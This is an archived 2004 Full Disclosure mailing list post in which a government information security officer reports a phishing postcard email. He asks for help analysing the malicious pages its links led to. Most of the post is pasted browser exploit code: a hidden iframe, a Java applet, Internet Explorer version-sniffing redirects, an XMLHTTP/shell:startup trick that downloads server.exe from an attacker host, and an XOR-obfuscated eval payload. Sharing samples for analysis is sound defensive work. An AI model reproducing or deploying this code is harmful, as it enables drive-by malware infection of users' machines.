Full Disclosure mailing list archives
Hxxp://mercylane.com/ Exploit code
From: "Peter B. Harvey \(Information Security\)" <peterharvey () emergency qld gov au>
Date: Thu, 14 Oct 2004 11:43:41 +1000
Hi all, Interesting occurance started to happen today, had about ten people trip off the virus alerts for Trend Micro JAVA_BYTEVER.A. Please note that the information given was obscured with xx to prevent unpatched system infection. At the time of writing I do not know what happens on a system that runs this code, any help would be appreciated. The email read as follows: ________________________________________________________________________ ____ A Digital Postcards(R) Greeting from John Korhonen waiting for you at POSTCARDS.COM! If you have a modern e-mail program, you can go directly to your card by clicking: http://Postcard.com/pickup/DP_416b029023245c15. *PLEASE* make sure your mail program has not cut the CardID # into 2 lines!! If it has, you need to use the Old-Fashioned method below. You can pick-up your postcard the old-fashioned way, by going to the following URL: http://postcard.com/cards/pickup.html. and entering your postcard ID number: DP_416b029023245c15 If postcard is not picked up within two weeks, it may be removed. Thank you! This is a free service of Digital Postcard(R) ________________________________________________________________________ ____ The card does not exist however the HTTP links went to mercylane.com Investigating the site I found this in the sites front page. ________________________________________________________________________ ____ xxIFRAME SRC="hxxp://katerjake.net/index1.php" width="0" height="0" FRAMEBORDER="0" SCROLLING="no" MARGINWIDTH="0" MARGINHEIGHT="0"xxxx/IFRAMExx ________________________________________________________________________ ____ Source of this page reveals. ________________________________________________________________________ ____ <html><body> <APPLET ARCHIVE="classload.jar" CODE="GetAccess.class" WIDTH=1 HEIGHT=1> <PARAM NAME="ModulePath" VALUE="hxxp://katerjake.net/server.exe"> </APPLET> <script> var ie6_page = "hxxp://katerjake.net/indexold.html"; var ie6_sp2_page = "hxxp://katerjake.net/index2.html"; var agt=navigator.userAgent.toLowerCase(); var appVer = navigator.appVersion.toLowerCase(); var minVer = navigator.appMinorVersion.toLowerCase(); var is_win = (navigator.platform.indexOf("Win32") != -1); var is_opera = (agt.indexOf("opera") != -1); var is_ie = appVer.indexOf("msie"); if (!is_opera && is_win && is_ie){ is_minor = parseFloat(appVer.substring(is_ie+5, appVer.indexOf(';',is_ie))); is_major = parseInt(is_minor); var is_ie51 = (is_minor == 5.5); var is_ie6 = (is_minor == 6.0); if (is_ie51) { document.location = ie51_page; } else if (is_ie6) { if (minVer.indexOf("sp2") != -1) { document.location = ie6_sp2_page; } // with sp2 else { // not sp2 starts if (minVer.indexOf("sp1") == -1) { document.location = ie6_page; } // without sp1 else { if (minVer.indexOf("q823353") != -1) { document.location = "hxxp://katerjake.net/index2.html"; } else if (minVer.indexOf("q837009") != -1) { document.location = "hxxp://katerjake.net/index2.html"; } else { document.location = "hxxp://katerjake.net/indexold.html"; } } } // not sp2 ends } } </script> </html> ________________________________________________________________________ ____ Index 2 has ________________________________________________________________________ ____ <script> function govn(){ var w=window.open("javascript:setInterval(function(){try{var tempvar=opener.location.href;}catch(e){location.assign('javascript:var xmlHTTP = new ActiveXObject("Microsoft.XMLHTTP");xmlHTTP.open ("GET","http://katerjake.net/server.exe",false);xmlH TTP.send();var contents = xmlHTTP.responseBody;document.innerHTML=("<title>You Need a better browser</title><DIV ID=DS2 align=center style=position:absolute;left:10;top:-30;><br><br><cent er><font face=arial color=black><b>This web page requires Opera Comptable browser</b>&nbspYou can download Opera from the <a href=http://www.opera.com>Opera Software Group web site</a>.</center></div><html><iframe src=shell:startup HEIGHT=5000; WIDTH=5000 style=color:red;position:absolute;top:30;left:-2000;border:dotted;z-inde x:-90;></iframe><body onload=showpop()><script>function showpop(){pop=window.createPopup();pop.document.body.style.margin=0;pop. document.body.innerHTML=txt.value;pop.show(100,100,screen.width+300,scre en.height+300);}</script><span style=position: absolute; left: 1; top: 1 id=absspan></span><textarea id=txt rows=1 cols=20 style=display:none><html><body><table width=100% height=100%><tr ALIGN=LEFT VALIGN=TOP><br><center><img src=http://katerjake.net/server.exe id=anch onmousedown=parent.pop.show(1,1,1,1); style=width=4000px;height=4000px;background-image:url(&quot;http://k aterjake.net/1.gif&quot;);></a></td></tr></t able></textarea></body></html>")');window.clos e();}},100)","_blank","height=10,width=10,left=10000,top=10000"); w.location.assign=location.assign; location.href="http://localhost"; } govn() </script> ________________________________________________________________________ ____ Index old has ________________________________________________________________________ ____ <html> <script> x=35; es="71;75;70;83;74;77;71;94;5;91;95;71;91;85;25;71;93;81;70;85;86;72;92; 18;28;25;72;14;15;115;2;103;54;116;117;112;1;109;60;122;123;122;127;107; 58;96;97;100;18;113;32;102;103;110;108;127;46;108;109;104;108;69;20;82;8 3;83;81;67;18;88;89;88;91;73;24;94;95;70;69;87;6;68;69;64;70;93;12;74;75 ;75;73;91;10;176;177;180;178;161;240;182;183;187;205;175;254;188;189;188 ;189;181;228;162;163;162;209;179;226;168;169;173;168;185;232;174;175;146 ;229;135;214;148;149;144;158;141;220;154;155;155;153;139;218;128;129;133 ;128;145;192;134;135;139;248;159;206;140;141;136;251;229;180;242;243;242 ;253;227;178;248;249;253;255;233;184;254;255;230;149;247;166;228;229;224 ;148;253;172;234;235;239;156;251;170;208;209;212;213;193;144;214;215;222 ;208;207;158;220;221;216;172;213;132;194;195;194;192;211;130;200;201;201 ;186;217;136;206;207;306;327;295;374;308;309;308;321;301;380;314;315;312 ;318;299;378;288;289;289;338;305;352;294;295;301;346;319;366;300;301;299 ;348;261;340;274;275;272;353;259;338;280;281;286;282;265;344;286;287;260 ;264;279;326;260;261;258;370;285;332;266;267;270;376;283;330;368;369;374 ;263;353;304;374;375;380;369;367;318;380;381;379;379;373;292;354;355;358 ;356;371;290;360;361;364;355;377;296;366;367;343;341;327;278;340;341;337 ;339;333;284;346;347;347;349;331;282;320;321;321;306;337;256;326;327;330 ;319;351;270;332;333;332;313;421;500;434;435;434;455;419;498;440;441;444 ;442;425;504;446;447;423;421;439;486;420;421;416;418;445;492;426;427;427 ;431;443;490;400;401;404;482;385;464;406;407;414;408;399;478;412;413;408 ;493;405;452;386;387;386;384;403;450;392;393;392;510;409;456;398;399;502 ;388;487;438;500;501;496;498;493;444;506;507;507;505;491;442;480;481;480 ;405;497;416;486;487;490;415;511;430;492;493;488;486;453;404;466;467;466 ;416;451;402;472;473;476;479;457;408;478;479;454;452;471;390;452;453;449 ;463;477;396;458;459;462;440;475;394;560;561;564;560;545;624;566;567;574 ;561;559;638;572;573;568;587;565;612;546;547;551;596;563;610;552;553;553 ;602;569;616;558;559;530;615;519;598;532;533;528;542;525;604;538;539;538 ;616;523;602;512;513;516;519;529;576;518;519;526;524;543;590;524;525;521 ;519;613;564;626;627;630;512;611;562;632;633;636;627;617;568;638;639;615 ;613;631;550;612;613;608;531;637;556;618;619;618;542;635;554;592;593;592 ;593;577;528;598;599;602;601;591;542;604;605;601;603;597;516;578;579;579 ;588;595;514;584;585;589;587;601;520;590;591;694;692;679;758;692;693;693 ;707;685;764;698;699;702;703;683;762;672;673;677;679;689;736;678;679;686 ;684;703;750;684;685;681;679;645;724;658;659;659;657;643;722;664;665;664 ;749;649;728;670;671;647;649;663;710;644;645;644;755;669;716;650;651;651 ;654;667;714;752;753;756;752;737;688;758;759;767;763;751;702;764;765;760 ;758;757;676;738;739;739;741;755;674;744;745;749;751;761;680;750;751;726 ;674;711;662;724;725;720;722;717;668;730;731;731;729;715;666;704;705;704 ;705;721;640;710;711;715;700;735;654;716;717;717;700;805;884;818;819;822 ;835;803;882;824;825;828;845;809;888;830;831;806;803;823;870;804;805;800 ;854;829;876;810;811;810;808;827;874;784;785;788;784;769;848;790;791;799 ;797;783;862;796;797;797;874;791;792;795;776;848;858;853;834;853;860;852 ;847;786;862;850;848;819;804;874;874;895;"; var ds=new String(); ads=es.split(";"); k=ads.length-1; m=5; for(var j=0;j<k;j++) {e=ads[j];d=e^x;m+=3;x+=1;ds=ds+String.fromCharCode(d);}eval(ds) </script> </html> ________________________________________________________________________ ____ Again I have not analysed what the code does yet. ____________________________________________ Peter Harvey Information Security Officer Dept. Emergency Services - QLD Phone: +61 7 3109 7213 ____________________________________________ This correspondence is for the named persons only. It may contain confidential or privileged information or both. No confidentiality or privilege is waived or lost by any mis transmission. If you receive this correspondence in error please delete it from your system immediately and notify the sender. You must not disclose, copy or relay on any part of this correspondence, if you are not the intended recipient. Any opinions expressed in this message are those of the individual sender except where the sender expressly, and with the authority, states them to be the opinions of the Department of Emergency Services, Queensland. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Hxxp://mercylane.com/ Exploit code Peter B. Harvey (Information Security) (Oct 14)